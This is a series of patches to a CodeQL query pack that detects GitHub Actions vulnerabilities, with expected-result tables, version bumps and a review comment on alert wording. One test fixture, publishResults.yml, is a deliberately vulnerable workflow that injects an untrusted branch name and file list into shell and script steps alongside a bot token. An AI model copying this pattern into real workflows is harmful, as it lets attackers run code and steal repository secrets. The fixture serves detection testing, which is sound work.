| -| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. 
| +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test13.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a 
privileged workflow ($@) | .github/workflows/untrusted_checkout2.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | From 24a3df03869b741d6051194569433b1eb0723b13 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 13:41:23 +0100 Subject: [PATCH 0644/1267] tests: new tests for Code Injection --- .../.github/workflows/publishResults.yml | 80 +++++++++++++++++++ .../CWE-094/.github/workflows/test22.yml | 12 +++ .../CWE-094/CodeInjectionCritical.expected | 8 ++ 3 files changed, 100 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml 
diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml
new file mode 100644
index 00000000000..17d9680d907
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml
@@ -0,0 +1,80 @@
+on:
+ workflow_call:
+ inputs:
+ botGithubId:
+ description: bot id
+ type: string
+ required: true
+
+ secrets:
+ githubBotPAT:
+ description: The personal access token
+ required: true
+
+permissions: {} # all none
+
+jobs:
+ versions-check-result:
+ name: Publish Results
+ runs-on: ubuntu-latest
+ if: github.event.workflow_run.conclusion != 'skipped'
+ steps:
+
+ - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1
+ id: search-patch
+ with:
+ script: |
+ let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ run_id: context.payload.workflow_run.id,
+ ...context.repo
+ })
+ let artifact = allArtifacts.data.artifacts.find(artifact => artifact.name == 'git-patch')
+ return artifact?.id
+
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
+ if: steps.search-patch.outputs.result
+ with:
+ ref: '${{ github.event.workflow_run.head_sha }}'
+ persist-credentials: false #Opt out from persisting the default Github-token authentication in order to enable use of the bot's PAT when pushing below
+
+ - name: Download git patch
+ uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1
+ id: fetch-patch
+ if: steps.search-patch.outputs.result
+ with:
+ script: |
+ let download = await github.rest.actions.downloadArtifact({
+ artifact_id: ${{ steps.search-patch.outputs.result }},
+ archive_format: 'zip',
+ ...context.repo
+ })
+ let fs = require('fs')
+ fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/patch.zip`, Buffer.from(download.data))
+ await exec.exec('unzip', ['patch.zip'])
+ let pr_number = Number(fs.readFileSync('github_pull_request_number.txt'))
+ core.setOutput('pull_request_number', pr_number)
+ await io.rmRF('patch.zip')
+ await io.rmRF('github_pull_request_number.txt')
+
+ - name: Apply and push version increment
+ id: git-commit
+ if: steps.search-patch.outputs.result
+ run: |
+ fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)
+ echo "file-list<> $GITHUB_OUTPUT
+ echo "$fileList" >> $GITHUB_OUTPUT
+ echo "EOF" >> $GITHUB_OUTPUT
+
+ git push \
+ "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \
+ 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'
+ env:
+ BOT_PA_TOKEN: ${{ secrets.githubBotPAT }}
+
+ - name: Add or update information comment
+ uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1
+ if: always()
+ with:
+ github-token: ${{ secrets.githubBotPAT }}
+ script: |
+ const fileList = `${{ steps.git-commit.outputs.file-list }}`
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml
new file mode 100644
index 00000000000..52f7e8964c1
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml
@@ -0,0 +1,12 @@
+on:
+ workflow_run:
+ workflows: [ 'Pull-Request Checks' ]
+ types: [ completed ]
+
+jobs:
+ publish-results:
+ uses: TestOrg/TestRepo/.github/workflows/publishResults.yml@master
+ with:
+ botGithubId: bot
+ secrets:
+ githubBotPAT: ${{ secrets.BOT_PAT }}
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index dad99f0029a..5187e875cb7 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
@@ -13,6 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | 
@@ -232,6 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | 
input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -617,6 +623,8 @@ subpaths | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | From ee7e50c1cf5787f0a129863d81eea34972e39c0a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 13:42:02 +0100 Subject: [PATCH 0645/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 29687dd7a06..9554a52d934 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.78 +version: 0.1.79 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7b88d83d38e..f6fe9791a93 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.78 +version: 0.1.79 groups: [actions, queries] suites: codeql-suites extractor: javascript From 871193095a9eb55a4117f126576bd912df9bad8f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 19:04:02 +0100 Subject: [PATCH 0646/1267] feat: Add trigger event to cache poisoning queries --- .../Security/CWE-349/CachePoisoningViaDirectCache.ql | 3 ++- .../Security/CWE-094/CodeInjectionMedium.expected | 6 ++++++ .../CWE-349/CachePoisoningViaDirectCache.expected | 12 ++++++------ 3 files changed, 14 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index 91bb4d3bc5a..85a0f53df1d 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -67,4 +67,5 @@ where ) and not step instanceof PoisonableStep select step, source, step, - "Potential cache poisoning in the context of the default branch " + message + "Potential cache poisoning in the context of the default branch " + message + " ($@).", event, + event.getName() diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 5d1ae7c3e74..ddfa951241e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
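Review bot: The new alert text in CachePoisoningViaDirectCache.ql ends up with doubled punctuation: `message` already closes with a period, so appending `" ($@)."` in the `select` yields "... due to privilege checkout of untrusted code. ($@)." as the updated CachePoisoningViaDirectCache.expected rows show. The untrusted-checkout queries in this series render the same trigger link as "... on a privileged workflow ($@)" with no inner period, so the two alert families now read differently when triaged side by side. Dropping the trailing period where `message` is assigned would give "... untrusted code ($@)."; that assignment and the start of the `where` clause are outside this hunk, and it is presumably also where "privilege checkout" should read "privileged checkout". The .expected file needs regenerating after either change.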
@@ -13,6 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | 
@@ -232,6 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | 
input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index f45755adf1d..4cc8536b594 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected 
@@ -44,9 +44,9 @@ edges | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | #select -| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
